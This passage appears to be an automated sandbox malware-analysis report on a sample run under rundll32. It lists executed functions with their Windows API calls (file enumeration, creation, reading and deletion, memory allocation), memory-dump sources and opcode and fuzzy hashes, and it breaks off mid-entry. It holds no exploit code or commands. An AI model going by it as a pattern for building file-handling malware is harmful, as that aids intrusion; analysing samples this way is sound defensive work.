2a60847 32802->32803 32804 2a63780 10 API calls 32803->32804 32805 2a60852 32804->32805 32805->32771 32806->32798 32807->32796 32808->32332 32809->32347 32810->32345 32811->32339

                                                                                                                Executed Functions

                                                                                                                Function 02A631FA Relevance: 4.6, APIs: 3, Instructions: 109fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 02A632E1
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6331E
                                                                                                                • FindClose.KERNEL32(?), ref: 02A63329
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: 9559b0f6737681a7ae24af58728e0f369c466f2328b56c4012da8effc699822f
                                                                                                                • Instruction ID: e9875173a5d30a2a91ac5c91a0de1ed248bd446a3826b8ddf1e18f1ff6193c4a
                                                                                                                • Opcode Fuzzy Hash: 9559b0f6737681a7ae24af58728e0f369c466f2328b56c4012da8effc699822f
                                                                                                                • Instruction Fuzzy Hash: 15318575940249ABDB20DB64CD85FFF7779AF84B04F1445D8E908A7180DF70AA858BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A63200 Relevance: 4.6, APIs: 3, Instructions: 107fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • FindFirstFileW.KERNEL32(?,00000000), ref: 02A632E1
                                                                                                                • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6331E
                                                                                                                • FindClose.KERNEL32(?), ref: 02A63329
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Find$File$CloseFirstNext
                                                                                                                • String ID:
                                                                                                                • API String ID: 3541575487-0
                                                                                                                • Opcode ID: f22d47e0f5640593ca4081b93b98fcae386712108b33a384c9fa8dc5bf3fcaae
                                                                                                                • Instruction ID: e0677237eaa4d952e670b8fa8517ef7a95ee31c06b389838f8f1f3d9739a8889
                                                                                                                • Opcode Fuzzy Hash: f22d47e0f5640593ca4081b93b98fcae386712108b33a384c9fa8dc5bf3fcaae
                                                                                                                • Instruction Fuzzy Hash: 7B318571940249BBDB20DB64CD89FFF777DEF84B04F144598B908A7180DFB0AA858BA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C7CB Relevance: 1.5, APIs: 1, Instructions: 42filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02A6759C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A6759C,?,00000000,00000060,00000000,00000000), ref: 02A6C81D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: ee5915a32a84439ea0eaef9c8393fecbd1f93d3afcde83d62f03af28f498007b
                                                                                                                • Instruction ID: 45dea1d0f6fa2536619dd1fd4b012509cad83c19769aaefc3dd00a216b28822f
                                                                                                                • Opcode Fuzzy Hash: ee5915a32a84439ea0eaef9c8393fecbd1f93d3afcde83d62f03af28f498007b
                                                                                                                • Instruction Fuzzy Hash: 4901AFB2200108AFCB58CF99DC85EEB37AAAF8C354F158208BA0D97241D630E951CBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C7D0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtCreateFile.NTDLL(00000060,00000000,?,02A6759C,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02A6759C,?,00000000,00000060,00000000,00000000), ref: 02A6C81D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CreateFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 823142352-0
                                                                                                                • Opcode ID: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction ID: c2cc2eac8285d8a08c5a1d0fd2321d07b2d7031266d9142af53c768ee546c744
                                                                                                                • Opcode Fuzzy Hash: 0e100477f5381d3d7289312ef97c1911a17bc4e8064b3a3f2b56bd156d4f763d
                                                                                                                • Instruction Fuzzy Hash: 70F06DB2215208ABCB48DF89DC85EEB77ADAF8C754F158248BA0997241D630F8518BA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A58D80 Relevance: 1.5, Strings: 1, Instructions: 288COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode
                                                                                                                • String ID: T
                                                                                                                • API String ID: 2340568224-3187964512
                                                                                                                • Opcode ID: e649de2fd984051d42af6a4735d6d1a831587877ba273ea6f9934422591156a8
                                                                                                                • Instruction ID: 8616f12ea2185d3237a511467a3656edc66afcfca6d6049eb5edf082ecef6c6d
                                                                                                                • Opcode Fuzzy Hash: e649de2fd984051d42af6a4735d6d1a831587877ba273ea6f9934422591156a8
                                                                                                                • Instruction Fuzzy Hash: 7CA1A1B1D40219AFDB14DFA4CD85FEFB7BAAF48304F044569E909A6140EF34A644CFA5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C880 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtReadFile.NTDLL(02A67760,02A62C2C,FFFFFFFF,02A6724A,00000002,?,02A67760,00000002,02A6724A,FFFFFFFF,02A62C2C,02A67760,00000002,00000000), ref: 02A6C8C5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FileRead
                                                                                                                • String ID:
                                                                                                                • API String ID: 2738559852-0
                                                                                                                • Opcode ID: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction ID: 57558e84627075d3c22face9e723ae629212660d6839fb74e77cb235c04ddcda
                                                                                                                • Opcode Fuzzy Hash: 844797972357584b4267d2b4ccdf650626f96eee6e100a2b7eb001bcc7868e0e
                                                                                                                • Instruction Fuzzy Hash: 35F0A4B2200208ABCB14DF99DC84EEB77ADEF8C754F118248BA0D97241D630E8118BA1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C9B0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtAllocateVirtualMemory.NTDLL(00010000,?,00000000,02A517C4,00000004,00001000,00000000), ref: 02A6C9E9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AllocateMemoryVirtual
                                                                                                                • String ID:
                                                                                                                • API String ID: 2167126740-0
                                                                                                                • Opcode ID: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction ID: 57a3169bbbb210e4f8fe40cb5563f63dea79a0967d53bf39dde9350252146cc2
                                                                                                                • Opcode Fuzzy Hash: 007d9bb2bc6f869d9d5f2aff9c303a90246c852ee550cafd5b2adb6fd69cc88f
                                                                                                                • Instruction Fuzzy Hash: 53F0A5B6210218ABCB18DF89DC85EAB77ADEF88754F118159BE0997241C630F911CBB5
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C8CA Relevance: 1.5, APIs: 1, Instructions: 21filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtDeleteFile.NTDLL(02A67562,00000002,?,02A67562,00000000,00000018,?,?,6398FDE0,00000000,?), ref: 02A6C8F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 67dba125171d69ef394929055196f51f834783aca3ed7bd604501a9affb438d7
                                                                                                                • Instruction ID: 59b1448250757289837305618b72c21d91b36bf6db5b98618389fae4d11a84fe
                                                                                                                • Opcode Fuzzy Hash: 67dba125171d69ef394929055196f51f834783aca3ed7bd604501a9affb438d7
                                                                                                                • Instruction Fuzzy Hash: E9E0C2353401106BC720DF94CD88ED33B69EF88350F108845FA4C5B341C631E91587E0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C8FB Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02A5E565,00000000,?,02A5E565,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02A6C925
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 91ce04e1e7c7b3cd94ceb231c9e4254354cc0db552755e11232069f9945582ae
                                                                                                                • Instruction ID: af0b4f84c2d392a564127c2e0fea265ac73ffe46ae2b5ac7b146346a65143a92
                                                                                                                • Opcode Fuzzy Hash: 91ce04e1e7c7b3cd94ceb231c9e4254354cc0db552755e11232069f9945582ae
                                                                                                                • Instruction Fuzzy Hash: D6E0C272200104ABEB10DBF4CC48FD73F29DF88360F008456BA1C9B681C531E910CBE0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C8D0 Relevance: 1.5, APIs: 1, Instructions: 20filenativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtDeleteFile.NTDLL(02A67562,00000002,?,02A67562,00000000,00000018,?,?,6398FDE0,00000000,?), ref: 02A6C8F5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: DeleteFile
                                                                                                                • String ID:
                                                                                                                • API String ID: 4033686569-0
                                                                                                                • Opcode ID: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                • Instruction ID: e989f7df1eb8f804c4a8ab31fb266d215fea191c7b84ec1b2de37f4c0f1302d5
                                                                                                                • Opcode Fuzzy Hash: 9cdb9952ef2d184753929ab23e7c45e026e579668fdbcbf3541df72b633117aa
                                                                                                                • Instruction Fuzzy Hash: F8D017722402146BD614EB99DC89ED77BACDF88760F018455BA1D5B681CA30FA108BE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 02A6C900 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • NtClose.NTDLL(02A5E565,00000000,?,02A5E565,?,?,?,?,?,?,?,00000000,?,00000000), ref: 02A6C925
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830559434.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_2a50000_rundll32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID:
                                                                                                                • API String ID: 3535843008-0
                                                                                                                • Opcode ID: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction ID: b9fd70847319de5ee12b1c178ac3e94031bd7b2b8303b256cbcbb953fb8bec77
                                                                                                                • Opcode Fuzzy Hash: 675b6986af3fbe89ca5381cf45abfbeb38fb14a73c53f9364842799534e556c6
                                                                                                                • Instruction Fuzzy Hash: 87D01772240214ABD614EBA9DC89E977BADDF88660F018455BA1D5B682C630FA108AE1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 540cf401434b90c4e295328e8bf2da9caa1c36eb38c2a8f5e5b3b8d974b2f780
                                                                                                                • Instruction ID: 752b7033c0c79d3becc89ace00aa4f1a131bfe93f6559ee0253a609833314cca
                                                                                                                • Opcode Fuzzy Hash: 540cf401434b90c4e295328e8bf2da9caa1c36eb38c2a8f5e5b3b8d974b2f780
                                                                                                                • Instruction Fuzzy Hash: 079002A5611000032907A55907045070056DBD5395351C022F5006551DD765D8A16161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449560 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9be1ca737fce6a31c97b5129f20fe14c0a73ce95ef41668c5003d9b4650ec527
                                                                                                                • Instruction ID: 36b99e8c8b274c2e5393ec27cdddc5e05b01e7973ab8b4418df390a22ff1ab9f
                                                                                                                • Opcode Fuzzy Hash: 9be1ca737fce6a31c97b5129f20fe14c0a73ce95ef41668c5003d9b4650ec527
                                                                                                                • Instruction Fuzzy Hash: 289002A5621000032947A559060450B0455EBD6395391C016F5407591DC765D8A56361
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044495D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f05d4ef39dc3d30fb41402edc3abc998e9dced9081c3ecf75950646b36440d9a
                                                                                                                • Instruction ID: e652a6f25c3925035679c7c38a10f33d0eb47721cac5dc827d72f4e281579774
                                                                                                                • Opcode Fuzzy Hash: f05d4ef39dc3d30fb41402edc3abc998e9dced9081c3ecf75950646b36440d9a
                                                                                                                • Instruction Fuzzy Hash: F39002E160200003690771594414616401ADBE0245B51C022E5005591EC669D8D17165
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 39af398b4229546f45d13ee9328b09528d776854758d57f42f07fd308a558043
                                                                                                                • Instruction ID: c5606c11f805a77719d2cf85eca50be2b0d3bcd35b0572bc4a893bb99bd41d86
                                                                                                                • Opcode Fuzzy Hash: 39af398b4229546f45d13ee9328b09528d776854758d57f42f07fd308a558043
                                                                                                                • Instruction Fuzzy Hash: 669002B160504843F94271594404A460025DBD0349F51C012A4055695E9769DD95B6A1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449660 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 935256640bdb3d9489b1c15ecdeb31761b3b43d4265ba3a6fda54daba648adbb
                                                                                                                • Instruction ID: 99c0b4727ea1e1c3a440679aa30f6dc139426d3c7483dfd16c6f51b684fcf3df
                                                                                                                • Opcode Fuzzy Hash: 935256640bdb3d9489b1c15ecdeb31761b3b43d4265ba3a6fda54daba648adbb
                                                                                                                • Instruction Fuzzy Hash: D59002B160100803F9827159440464A0015DBD1345F91C016A4016655ECB59DA9977E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449610 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 9708347034fa5371a595d48347b947bf2cc04a471c0a759472d6431a142e3fcb
                                                                                                                • Instruction ID: 3794198bd65922fb3ba598ef3fc46c0837e695502b49353a5ea7dc1761a2d965
                                                                                                                • Opcode Fuzzy Hash: 9708347034fa5371a595d48347b947bf2cc04a471c0a759472d6431a142e3fcb
                                                                                                                • Instruction Fuzzy Hash: 8F9002B1A0500803F952715944147460015DBD0345F51C012A4015655E8799DA9576E1
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044496D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: 4db97232c93d6efc1abccdeb77a20908bf835ddd6cc02d2bbb07c23d1dbfa7af
                                                                                                                • Instruction ID: fa3a073222fad5a22bb8e2059b03b168941694ad6ef96bcbbafce06492d46332
                                                                                                                • Opcode Fuzzy Hash: 4db97232c93d6efc1abccdeb77a20908bf835ddd6cc02d2bbb07c23d1dbfa7af
                                                                                                                • Instruction Fuzzy Hash: 179002B160100843F90261594404B460015DBE0345F51C017A4115655E8759D8917561
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 044496E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: b71edc4c6f3621e9d02ed4a941598564fa7cdebdd01bc746a0d9e37ac27eed42
                                                                                                                • Instruction ID: 92f91ac7f35cbb97b14ba6111335af5ca43a3eace36d6ee40386c65f00817f8d
                                                                                                                • Opcode Fuzzy Hash: b71edc4c6f3621e9d02ed4a941598564fa7cdebdd01bc746a0d9e37ac27eed42
                                                                                                                • Instruction Fuzzy Hash: D79002B160108803F9126159840474A0015DBD0345F55C412A8415659E87D9D8D17161
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449710 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: f3f3e0873ff8b94ea523d73e670d62b84edaf57686f84a39477bfb36b9095c85
                                                                                                                • Instruction ID: 033620fea6c190caa3b5f41f4f2689325f393dbb230d8454504186f88b4a8462
                                                                                                                • Opcode Fuzzy Hash: f3f3e0873ff8b94ea523d73e670d62b84edaf57686f84a39477bfb36b9095c85
                                                                                                                • Instruction Fuzzy Hash: 6D9002B160100403F902659954086460015DBE0345F51D012A9015556FC7A9D8D17171
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: ec00e3ad2832731164f2e2f96ede171c89f0af77a008722cc4b53e727decfe06
                                                                                                                • Instruction ID: b8c95fd350ab0ca527be59ae07b57051c320d988f9f8cc376b41c446e048cdcb
                                                                                                                • Opcode Fuzzy Hash: ec00e3ad2832731164f2e2f96ede171c89f0af77a008722cc4b53e727decfe06
                                                                                                                • Instruction Fuzzy Hash: 579002B171114403F912615984047060015DBD1245F51C412A4815559E87D9D8D17162
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 04449780 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000008.00000002.830833149.00000000043E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 043E0000, based on PE: true
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                • Associated: 00000008.00000002.830833149.00000000044FF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_8_2_43e0000_rundll32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: InitializeThunk
                                                                                                                • String ID:
                                                                                                                • API String ID: 2994545307-0
                                                                                                                • Opcode ID: d88d82aa61c413487ea744b1057ebd455d068fa56c7c60ee6f94b1c1794263e4
                                                                                                                • Instruction ID: 62bdd979f0b5cccbc272afa2225ad282d7f5d4612d3f71ea841b7a9a05a18b4d
                                                                                                                • Opcode Fuzzy Hash: d88d82aa61c413487ea744b1057ebd455d068fa56c7c60ee6f94b1c1794263e4
